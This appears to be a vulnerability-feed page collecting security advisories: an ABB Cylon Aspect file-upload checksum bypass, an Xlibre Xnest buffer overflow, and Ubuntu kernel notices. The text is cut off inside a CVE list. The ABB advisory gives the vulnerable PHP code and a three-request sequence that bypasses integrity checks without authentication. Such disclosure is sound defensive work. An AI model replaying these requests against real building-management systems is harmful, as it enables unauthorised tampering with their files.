ABB Cylon Aspect version 3.08.01 has a vulnerability in caldavInstall.php, caldavInstallAgendav.php, and caldavUpload.php files, where the presence of an EXPERTMODE parameter activates a badassMode feature. This mode allows an unauthenticated attacker to bypass MD5 checksum validation during file uploads. By enabling badassMode and setting the skipChecksum parameter, the system skips integrity verification, allowing attackers to upload or install altered CalDAV zip files without authentication. This vulnerability permits unauthorized file modifications, potentially exposing the system to tampering or malicious uploads.

    ABB Cylon Aspect 3.08.01 (badassMode) File Upload MD5 Checksum BypassVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS system has a vulnerability in caldavInstall.php,caldavInstallAgendav.php, and caldavUpload.php files, where the presenceof an EXPERTMODE parameter activates a badassMode feature. This mode allowsan unauthenticated attacker to bypass MD5 checksum validation during fileuploads. By enabling badassMode and setting the skipChecksum parameter, thesystem skips integrity verification, allowing attackers to upload or installaltered CalDAV zip files without authentication. This vulnerability permitsunauthorized file modifications, potentially exposing the system to tamperingor malicious uploads.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5860Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5860.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ head caldavInstall.php caldavInstallAgendav.php==> caldavInstall.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>==> caldavInstallAgendav.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>1. GET /caldavInstall.php?EXPERTMODE (FE)2. GET /caldavInstallAgendav.php?EXPERTMODE (FE)3. POST /caldavUpload.php -d "skipChecksum=1" (BE)

ABB Cylon Aspect 3.08.01 File Upload MD5 Checksum Bypass

Xlibre Xnest versions 24.1.0 and 24.2.0 suffer from a buffer overflow vulnerability that affected Xorg.

    XLibre project security advisory---------------------------------As Xlibre Xnest is based on Xorg, it is affected by some security issueswhich recently became known in Xorg: CVE-2024-9632: can be triggered by providing a modified bitmap to theX.Org server. CVE-2024-9632: Heap-based buffer overflow privilege escalation in_XkbSetCompatMapSee:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9632Affected versions:  * 24.1.0  * 24.2.024.1.x release:   Repo:   https://gitlab.freedesktop.org/metux/xserver.git   Branch: xlibre/xnest/24.1   Tag:    xnest-24.1.1   SHA:    11450b0946c1035944c5946d665f21f83356b6b924.2.x release:   Repo:   https://gitlab.freedesktop.org/metux/xserver.git   Branch: xlibre/xnest/24.2   Tag:    xnest-24.2.1   SHA:    9a6aec9bf62b6bdd75795a5e28648d4af07fe413These bugfix branches also contain several other pointer and boundsrelated problems that haven't been rated as possibly exploitable yet,but no other unnecessary changes which don't fix actual bugs.All users are strongly advised to upgrade to the fixed mainenancereleases ASAP.--mtx-----Enrico Weigelt, metux IT consultFree software and Linux embedded engineeringinfo@metux.net -- +49-151-27565287

Xlibre Xnest 24.1.0 / 24.2.0 Buffer Overflow

Ubuntu Security Notice 7090-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7090-1November 01, 2024linux-azure-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-6.8: Linux kernel for Microsoft Azure cloud systemsDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-42064, CVE-2024-43858, CVE-2024-42251, CVE-2024-42113,CVE-2024-41020, CVE-2024-41093, CVE-2024-45016, CVE-2024-42150,CVE-2024-42069, CVE-2024-42157, CVE-2024-42126, CVE-2024-42144,CVE-2024-42093, CVE-2024-41035, CVE-2024-41032, CVE-2024-41077,CVE-2024-42097, CVE-2024-41071, CVE-2024-42227, CVE-2024-42253,CVE-2024-42237, CVE-2024-41060, CVE-2024-42080, CVE-2024-42068,CVE-2024-41058, CVE-2024-42140, CVE-2024-42231, CVE-2024-42127,CVE-2024-42243, CVE-2023-52887, CVE-2024-39486, CVE-2024-41063,CVE-2024-42128, CVE-2024-42074, CVE-2024-41028, CVE-2024-42110,CVE-2024-45001, CVE-2024-41090, CVE-2024-41084, CVE-2024-41088,CVE-2024-42118, CVE-2024-41094, CVE-2024-41091, CVE-2024-41007,CVE-2024-42280, CVE-2024-41044, CVE-2024-41012, CVE-2024-42063,CVE-2024-41078, CVE-2024-42082, CVE-2024-41055, CVE-2024-41031,CVE-2024-42142, CVE-2024-41083, CVE-2024-42145, CVE-2024-41039,CVE-2024-41019, CVE-2024-42149, CVE-2024-42248, CVE-2024-42111,CVE-2024-41074, CVE-2024-42096, CVE-2024-42100, CVE-2024-41010,CVE-2024-43855, CVE-2024-42136, CVE-2024-41054, CVE-2024-41053,CVE-2024-41061, CVE-2024-42104, CVE-2024-41025, CVE-2024-42129,CVE-2024-41086, CVE-2024-42133, CVE-2024-42115, CVE-2024-42158,CVE-2024-42091, CVE-2024-42088, CVE-2024-42161, CVE-2024-42236,CVE-2024-41065, CVE-2024-41062, CVE-2024-42153, CVE-2024-41030,CVE-2024-41079, CVE-2023-52888, CVE-2024-42223, CVE-2024-42119,CVE-2024-42238, CVE-2024-41052, CVE-2024-41064, CVE-2024-42138,CVE-2024-41081, CVE-2024-41034, CVE-2024-42147, CVE-2024-41095,CVE-2024-42132, CVE-2024-42137, CVE-2024-42106, CVE-2024-41041,CVE-2024-41073, CVE-2024-41033, CVE-2024-41075, CVE-2024-42112,CVE-2024-41070, CVE-2024-42234, CVE-2024-41027, CVE-2024-42105,CVE-2024-41089, CVE-2024-41098, CVE-2024-42152, CVE-2024-42101,CVE-2024-41050, CVE-2024-41069, CVE-2024-42120, CVE-2024-42130,CVE-2024-42084, CVE-2024-41066, CVE-2024-42108, CVE-2024-42087,CVE-2024-41067, CVE-2024-41023, CVE-2024-41046, CVE-2024-42079,CVE-2024-42065, CVE-2024-42098, CVE-2024-42070, CVE-2024-41076,CVE-2024-41082, CVE-2024-41096, CVE-2024-42235, CVE-2024-42085,CVE-2024-42246, CVE-2024-41049, CVE-2024-42076, CVE-2024-41048,CVE-2024-41038, CVE-2024-42241, CVE-2024-41092, CVE-2024-42114,CVE-2024-41036, CVE-2024-41047, CVE-2024-41029, CVE-2024-42092,CVE-2024-41068, CVE-2024-42067, CVE-2024-42094, CVE-2024-42245,CVE-2024-41051, CVE-2024-42250, CVE-2024-42151, CVE-2024-41059,CVE-2024-41056, CVE-2024-42095, CVE-2024-42131, CVE-2024-42271,CVE-2024-42066, CVE-2024-42240, CVE-2024-41017, CVE-2024-42141,CVE-2024-41072, CVE-2024-42229, CVE-2024-42239, CVE-2024-42073,CVE-2024-42124, CVE-2024-41080, CVE-2024-42146, CVE-2024-41018,CVE-2024-41021, CVE-2024-39487, CVE-2024-42086, CVE-2024-42109,CVE-2024-41045, CVE-2024-41037, CVE-2024-41097, CVE-2024-42225,CVE-2024-42102, CVE-2024-42117, CVE-2024-42077, CVE-2024-42230,CVE-2024-41087, CVE-2024-42089, CVE-2024-42252, CVE-2024-42247,CVE-2024-41057, CVE-2024-42121, CVE-2024-42232, CVE-2024-42090,CVE-2024-41042, CVE-2024-42244, CVE-2024-42156, CVE-2024-42135,CVE-2024-42155, CVE-2024-42103, CVE-2024-41015, CVE-2024-41022,CVE-2024-41085)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-6.8.0-1017-azure    6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-azure-fde  6.8.0-1017.20~22.04.1  linux-image-azure               6.8.0-1017.20~22.04.1  linux-image-azure-fde           6.8.0-1017.20~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7090-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858,  CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-6.8/6.8.0-1017.20~22.04.1

Ubuntu Security Notice USN-7090-1

Ubuntu Security Notice 7089-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7089-1November 01, 2024linux, linux-azure-6.8, linux-gcp-6.8, linux-hwe-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure-6.8: Linux kernel for Microsoft Azure cloud systems- linux-gcp-6.8: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-6.8: Linux hardware enablement (HWE) kernelDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-41079, CVE-2024-41058, CVE-2024-41029, CVE-2024-42253,CVE-2024-41075, CVE-2024-42280, CVE-2024-42102, CVE-2024-41055,CVE-2024-41025, CVE-2024-42124, CVE-2024-41060, CVE-2024-41027,CVE-2024-42145, CVE-2024-42146, CVE-2024-42251, CVE-2024-41081,CVE-2024-42065, CVE-2024-42129, CVE-2024-41031, CVE-2024-41035,CVE-2024-41047, CVE-2023-52888, CVE-2024-42248, CVE-2024-41039,CVE-2024-42119, CVE-2024-41038, CVE-2024-42150, CVE-2024-42073,CVE-2024-42089, CVE-2024-41007, CVE-2024-42120, CVE-2024-42069,CVE-2024-41096, CVE-2024-42153, CVE-2024-41012, CVE-2024-42151,CVE-2024-42241, CVE-2024-42126, CVE-2024-42092, CVE-2024-42231,CVE-2024-41032, CVE-2024-41076, CVE-2024-42136, CVE-2024-41078,CVE-2024-41068, CVE-2024-41070, CVE-2024-41091, CVE-2024-42063,CVE-2024-42157, CVE-2024-42118, CVE-2024-41046, CVE-2024-41023,CVE-2024-42094, CVE-2024-41042, CVE-2024-41034, CVE-2024-42096,CVE-2024-42105, CVE-2024-41051, CVE-2024-42239, CVE-2024-42117,CVE-2024-41019, CVE-2024-41033, CVE-2024-42223, CVE-2024-41098,CVE-2024-41052, CVE-2024-41036, CVE-2024-41087, CVE-2024-42115,CVE-2024-41057, CVE-2024-42161, CVE-2024-42240, CVE-2024-41093,CVE-2024-42097, CVE-2024-42077, CVE-2024-41062, CVE-2024-42156,CVE-2024-41077, CVE-2024-42235, CVE-2024-41085, CVE-2023-52887,CVE-2024-42237, CVE-2024-41061, CVE-2024-41073, CVE-2024-42087,CVE-2024-41086, CVE-2024-41044, CVE-2024-41066, CVE-2024-42128,CVE-2024-42144, CVE-2024-42227, CVE-2024-41020, CVE-2024-41015,CVE-2024-42232, CVE-2024-41072, CVE-2024-41030, CVE-2024-42098,CVE-2024-42121, CVE-2024-42080, CVE-2024-41071, CVE-2024-42225,CVE-2024-42064, CVE-2024-42246, CVE-2024-42113, CVE-2024-41082,CVE-2024-42095, CVE-2024-41080, CVE-2024-41056, CVE-2024-42147,CVE-2024-41069, CVE-2024-42135, CVE-2024-42245, CVE-2024-42244,CVE-2024-42271, CVE-2024-41084, CVE-2024-42234, CVE-2024-41064,CVE-2024-42108, CVE-2024-41090, CVE-2024-42079, CVE-2024-42138,CVE-2024-42127, CVE-2024-42149, CVE-2024-41067, CVE-2024-42130,CVE-2024-42086, CVE-2024-41045, CVE-2024-42088, CVE-2024-42131,CVE-2024-41063, CVE-2024-42111, CVE-2024-41088, CVE-2024-42110,CVE-2024-41074, CVE-2024-41041, CVE-2024-39487, CVE-2024-42076,CVE-2024-42091, CVE-2024-42132, CVE-2024-42100, CVE-2024-41010,CVE-2024-42093, CVE-2024-41048, CVE-2024-41059, CVE-2024-42137,CVE-2024-41065, CVE-2024-42067, CVE-2024-42140, CVE-2024-42250,CVE-2024-42084, CVE-2024-42155, CVE-2024-41021, CVE-2024-41089,CVE-2024-42106, CVE-2024-41083, CVE-2024-42112, CVE-2024-42101,CVE-2024-42229, CVE-2024-41053, CVE-2024-42074, CVE-2024-42252,CVE-2024-41018, CVE-2024-41095, CVE-2024-42090, CVE-2024-41097,CVE-2024-42236, CVE-2024-42109, CVE-2024-42158, CVE-2024-43858,CVE-2024-42133, CVE-2024-42066, CVE-2024-41094, CVE-2024-39486,CVE-2024-41050, CVE-2024-41028, CVE-2024-42114, CVE-2024-41049,CVE-2024-42070, CVE-2024-42243, CVE-2024-41092, CVE-2024-43855,CVE-2024-42103, CVE-2024-41022, CVE-2024-42142, CVE-2024-42238,CVE-2024-42152, CVE-2024-41037, CVE-2024-42230, CVE-2024-42082,CVE-2024-42085, CVE-2024-42104, CVE-2024-41017, CVE-2024-41054,CVE-2024-42068, CVE-2024-42141, CVE-2024-42247)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-48-generic    6.8.0-48.48  linux-image-6.8.0-48-generic-64k  6.8.0-48.48  linux-image-generic             6.8.0-48.48  linux-image-generic-64k         6.8.0-48.48  linux-image-generic-64k-hwe-24.04  6.8.0-48.48  linux-image-generic-hwe-24.04   6.8.0-48.48  linux-image-generic-lpae        6.8.0-48.48  linux-image-kvm                 6.8.0-48.48  linux-image-virtual             6.8.0-48.48  linux-image-virtual-hwe-24.04   6.8.0-48.48Ubuntu 22.04 LTS  linux-image-6.8.0-1017-azure    6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-azure-fde  6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-gcp      6.8.0-1017.19~22.04.1  linux-image-6.8.0-48-generic    6.8.0-48.48~22.04.1  linux-image-6.8.0-48-generic-64k  6.8.0-48.48~22.04.1  linux-image-azure               6.8.0-1017.20~22.04.1  linux-image-azure-fde           6.8.0-1017.20~22.04.1  linux-image-gcp                 6.8.0-1017.19~22.04.1  linux-image-generic-64k-hwe-22.04  6.8.0-48.48~22.04.1  linux-image-generic-hwe-22.04   6.8.0-48.48~22.04.1  linux-image-oem-22.04           6.8.0-48.48~22.04.1  linux-image-oem-22.04a          6.8.0-48.48~22.04.1  linux-image-oem-22.04b          6.8.0-48.48~22.04.1  linux-image-oem-22.04c          6.8.0-48.48~22.04.1  linux-image-oem-22.04d          6.8.0-48.48~22.04.1  linux-image-virtual-hwe-22.04   6.8.0-48.48~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7089-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, 